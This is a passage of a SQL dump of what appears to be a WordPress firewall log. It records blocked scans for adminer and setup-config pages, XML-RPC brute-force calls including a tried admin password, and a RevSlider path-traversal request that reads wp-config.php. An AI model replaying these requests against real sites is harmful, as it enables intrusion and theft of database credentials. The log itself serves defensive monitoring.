àH?âý·',''),(15578,1573236462,'¿õ»dòYÎÚÜƒö€’®H','','admin',0,'US','blocked','GET[80]:/portal/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15571,1573224035,'À¿ñŒ|û¾j\ZYv>»Ñ','','admin',0,'FR','blocked','GET[80]:/wordpress/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15572,1573226646,'È„ªÓóëeG×«ûï,H','','admin',0,'US','blocked','GET[80]:/website/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15573,1573226653,'	•zÒy°\Zuã<³ð™°\"Y','','login',0,'NL','blocked','GET[80]:/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','nñ8×µŒòb¯£\'MÁõ(¡à·Tªß­¢i€[a',''),(15574,1573229360,'uÌôüÂ@·\'w»õè','','admin',0,'ES','blocked','GET[80]:/cms/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15575,1573229757,'qôQO”{uœ×›ë9}`6A','','admin',0,'TW','blocked','GET[80]:/beta/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15576,1573231835,'uÌôüÂ@·\'w»õè','','admin',0,'ES','blocked','GET[80]:/staging/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15579,1573239113,'Dž½Ê™oá Ù‹\rÒ|','','admin',0,'US','blocked','GET[80]:/oldsite/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15580,1573239186,'ƒÙZ*p\nßšŽ³¢‰','','admin',0,'US','blocked','GET[80]:/www/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15553,1573163494,'¢W„2ñ(c:Ì+Bþ,','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15551,1573163490,'¢W„2ñ(c:Ì+Bþ,','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15552,1573163492,'¢W„2ñ(c:Ì+Bþ,','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15581,1573240609,'§hY‘©õúCžÂ‘ì%V','','admin',0,'FR','blocked','GET[80]:/website/wp-admin/setup-config.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15582,1573243749,'qôQO”{uœ×›ë9}`6A','','admin',0,'TW','blocked','GET[80]:/cms/wp-admin/setup-config.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15790,1573671519,'GÜæ°ÿ8ë¡çTV','','admin',0,'GB','blocked','GET[80]://wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0','«ÉÓ\'Ñ”þËÇ±L·0š¸ÒÇ1c.jÕà=ÖÙË',''),(15569,1573212936,'IifxfÅ¾ðrÕñ×UGV','','login',0,'US','blocked','GET[443]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) DownloaderChrome/62.0.3202.75 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøw1Aôòö“,?!špq¼ŠhÄ£ò5 ú“P—ƒ:îIÚã´\0ò½=<RDÙTƒ±n¿/ÉdàÀ%”½Ô—©Û0…–­¨QÂý–XÓåaCpæð3™bv',''),(15566,1573212899,'ŠÏÙGôuÕ©™ƒŸÎú; ','','login',0,'US','blocked','GET[443]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) DownloaderChrome/62.0.3202.75 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøw1Aôòö“,?!špq¼ŠhÄ£ò5 ú“P—ƒ:îIÚã´\0ò½=<RDÙTƒ±n¿/ÉdàÀ%”½Ô—©Û0…–­¨QÂý–XÓåaCpæð3™bv',''),(15564,1573212094,'hƒM¼fú’ó…òd.¸“','','xmlrpc',0,'US','closed','POST[80]:/xmlrpc.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','nñ8×µŒòb¯£\'MÁõ(¡à·Tªß­¢i€[a','<?xml version=\"1.0\"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><dâ€¦'),(15565,1573212255,'gÚ-ºL÷J\n§SøûŽs','','login',0,'VN','blocked','GET[80]:/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','ÍÆn8oÊ)[qoðÅœ³0',''),(15560,1573181841,'ˆ®fxgß	µç¼,¿Õ>Àa','','xmlrpc',0,'US','closed','POST[80]:/blog/xmlrpc.php','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8','ÍÆn8oÊ)[qoðÅœ³0','<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>admin</string></value></param><param><value><string>narecumsafie55</string></value></param></params></methodCall>'),(15559,1573181841,'ˆ®fxgß	µç¼,¿Õ>Àa','','xmlrpc',0,'US','closed','POST[80]:/xmlrpc.php','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8','ÍÆn8oÊ)[qoðÅœ³0','<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>admin</string></value></param><param><value><string>narecumsafie55</string></value></param></params></methodCall>'),(15583,1573244077,'ËEÅ•¬‹ê1yÕ1Ö?q','','admin',0,'US','blocked','GET[80]:/beta/wp-admin/setup-config.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15584,1573246535,'$JW¶»8$`Ãœ©4tg­','','admin',0,'US','blocked','GET[80]:/staging/wp-admin/setup-config.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15556,1573163499,'¢W„2ñ(c:Ì+Bþ,','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15557,1573163501,'¢W„2ñ(c:Ì+Bþ,','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15745,1573539869,'„¼6u$­V—Gï&L=í','','login',0,'SG','blocked','GET[80]:/wp-login.php','Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1','nñ8×µŒòb¯£\'MÁõ(¡à·Tªß­¢i€[a',''),(15746,1573540045,'¦Í+×‘ù5²êÑ JŸa¥','','admin',0,'DE','blocked','GET[80]:/wp2/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15743,1573531366,'j3‹°ß(\n@½K¯Š-','','admin',0,'US','blocked','GET[80]:/v1/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15744,1573532802,'°|-¥¨¡£³¶ÙÍL6î','','admin',0,'US','blocked','GET[80]:/test/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15641,1573356027,'ÞÊåV“+nÏ…ÿ¶>è~Î','','xmlrpc',0,'UA','closed','POST[80]:/xmlrpc.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36','nñ8×µŒòb¯£\'MÁõ(¡à·Tªß­¢i€[a','<?xml version=\"1.0\"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><dâ€¦'),(15642,1573368780,'Ç28žBéÓˆØí7ä±å¤','','login',0,'IL','blocked','GET[443]:/wp-signup.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.64','×ˆ3ìÐ\0Œ±Ûaîøw1Aôòö“,?!špq¼ŠhÄ£ò5 ú“P—ƒ:îIÚã´\0ò½=<RDÙTƒ±n¿/ÉdàÀ%”¿ºéÍYÄâk¢šj›åÔÌ(t)…GÍgÜ\"„ÓH',''),(15643,1573368784,'Ç28žBéÓˆØí7ä±å¤','','login',0,'IL','blocked','GET[443]:/wp-login.php?action=register','Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17','×ˆ3ìÐ\0Œ±Ûaîøw1Aôòö“,?!špq¼ŠhÄ£ò5 ú“P—ƒ:îIÚã´\0ò½=<RDÙTƒ±n¿/ÉdàÀ%”½Ô—©Û0…–­¨QÂý–XÓåaCpæð3™bv',''),(15644,1573368787,'Ç28žBéÓˆØí7ä±å¤','','login',0,'IL','blocked','GET[443]:/wp-login.php?action=register','Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17','×ˆ3ìÐ\0Œ±Ûaîøw1Aôòö“,?!špq¼ŠhÄ£ò5 ú“P—ƒ:îIÚã´\0ò½=<RDÙTƒ±n¿/ÉdàÀ%”Ž¿AEÒY´ÎÂÜø¤nq?P–séì\'æãüô„Y¹1m&+!Ëž«ï#K\0–',''),(15791,1573675755,'ür¥¢ÄÚ¼‘¢aÄQ3Ç','','login',0,'UA','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4843.400 QQBrowser/9.7.13021.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15796,1573681695,'Üæã{–Ý§–xä#©\0î','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3409.2 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡\'¯A-â—:LV0ÙXˆ!',''),(15797,1573681697,'¼™•\"`Eä/ƒœ©¬ž3µÃ','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3409.2 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡\'¯A-â—:LV0ÙXˆ!',''),(15789,1573671518,'GÜæ°ÿ8ë¡çTV','','admin',0,'GB','blocked','GET[80]:/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0','«ÉÓ\'Ñ”þËÇ±L·0š¸ÒÇ1c.jÕà=ÖÙË',''),(15801,1573683247,'½eÑò.)J½wZmí°¦ë','','login',0,'KR','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 YaBrowser/18.3.1.1232 Yowser/2.5 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡\'¯A-â—:LV0ÙXˆ!',''),(15802,1573683249,'øW÷²æä6œiñæM×’','','login',0,'CA','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 YaBrowser/18.3.1.1232 Yowser/2.5 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡\'¯A-â—:LV0ÙXˆ!',''),(15803,1573683281,'²6ž8uiˆYCylÿñ¼','','login',0,'ID','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 YaBrowser/18.3.1.1232 Yowser/2.5 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15800,1573683244,'5%±+û@ØþîL‡˜CR.','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 YaBrowser/18.3.1.1232 Yowser/2.5 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡\'¯A-â—:LV0ÙXˆ!',''),(15798,1573681700,',`øðaU/.Üò\r`n','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3409.2 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡\'¯A-â—:LV0ÙXˆ!',''),(15799,1573681702,'Üæã{–Ý§–xä#©\0î','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3409.2 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15691,1573451772,'\n)aCqÊ>ýAÖ…C','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15692,1573451774,'|YAºßªâÛR9ôk‹»','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15697,1573456284,'*å4	îý:…_°HD\Zò','','xmlrpc',0,'CN','closed','POST[80]:/xmlrpc.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','nñ8×µŒòb¯£\'MÁõ(¡à·Tªß­¢i€[a','<?xml version=\"1.0\"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><dâ€¦'),(15698,1573456284,'*å4	îý:…_°HD\Zò','','xmlrpc',0,'CN','closed','POST[80]:/xmlrpc.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','nñ8×µŒòb¯£\'MÁõ(¡à·Tªß­¢i€[a','<?xml version=\"1.0\"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><dâ€¦'),(15719,1573508116,'S€â(ªÐ\ZµÉ¦†;','','admin',0,'FR','blocked','GET[80]:/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15720,1573510945,'¿õ»dòYÎÚÜƒö€’®H','','admin',0,'US','blocked','GET[80]:/2018/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15738,1573524394,'gR$cò7b„½åme','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3409.2 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15737,1573524392,'Tgç³Iö¯ðÿÂ¨	ê¼','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3409.2 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15786,1573640148,'T)A{|”w¹ûÜ\n','','login',0,'HK','blocked','GET[443]:/wp-login.php','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','R&äO­MšÞræ\"‰væ}',''),(15785,1573640146,'T)A{|”w¹ûÜ\n','','xmlrpc',0,'HK','closed','GET[443]:/xmlrpc.php','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','R&äO­MšÞræ\"‰væ}',''),(15696,1573451781,'\n)aCqÊ>ýAÖ…C','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15625,1573304874,'Å’Õ5f¸%¬—‰næÛä','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.183 Safari/537.36 Vivaldi/1.96.1147.42','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15618,1573299143,'ÝBãyŸýÖ‡â¥æ²¬x››','','admin',0,'FR','blocked','GET[80]:/news/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15619,1573300143,'S€â(ªÐ\ZµÉ¦†;','','admin',0,'FR','blocked','GET[80]:/v2/wp-admin/setup-config.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15616,1573298531,'fþô9ž’¿Žã/“ÕùÊp˜','','login',0,'RU','blocked','GET[80]:/wp-login.php','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36','ÍÆn8oÊ)[qoðÅœ³0',''),(15617,1573298547,'fþô9ž’¿Žã/“ÕùÊp˜','','xmlrpc',0,'RU','closed','POST[80]:/xmlrpc.php','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36','ÍÆn8oÊ)[qoðÅœ³0',''),(15615,1573298450,' :—Ú×ês)=W¹ÊF#E\\','','admin',0,'FR','blocked','GET[80]:/2019/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15592,1573268598,'Hà¥f½x\rš\'ß]»vŸR','','admin',0,'TH','blocked','GET[80]:/store/wp-admin/setup-config.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15593,1573270322,'›\n\\ (è[l.Ót™Ï','','admin',0,'IN','blocked','GET[80]:/wp-admin/setup-config.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15594,1573271917,'ƒÙZ*p\nßšŽ³¢‰','','admin',0,'US','blocked','GET[80]:/old/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15613,1573297168,'×D\'±uÄc\"£û•}K ','','admin',0,'US','blocked','GET[80]:/newsite/wp-admin/setup-config.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15614,1573297455,'¯}Ç!Ðw	 5A×¤ºf','','admin',0,'SG','blocked','GET[80]:/new/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15632,1573312420,'›\n\\ (è[l.Ót™Ï','','admin',0,'IN','blocked','GET[80]:/2019/wp-admin/setup-config.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15633,1573312965,'œe¥™96£%zB	\'','','admin',0,'US','blocked','GET[80]:/news/wp-admin/setup-config.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15812,1573731368,')5þCGž0+2„Êb/F¾','','login',0,'RO','blocked','GET[80]:/wp-login.php','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1','ÍÆn8oÊ)[qoðÅœ³0',''),(15813,1573731526,';;ð# Gµe ä£ü?Ža','','login',0,'CN','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.189 Safari/537.36 Vivaldi/1.95.1077.60','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15638,1573331890,'À¿ñŒ|û¾j\ZYv>»Ñ','','admin',0,'FR','blocked','GET[80]:/blogs/wp-admin/setup-config.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15639,1573334042,'°|-¥¨¡£³¶ÙÍL6î','','admin',0,'US','blocked','GET[80]:/wp2/wp-admin/setup-config.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <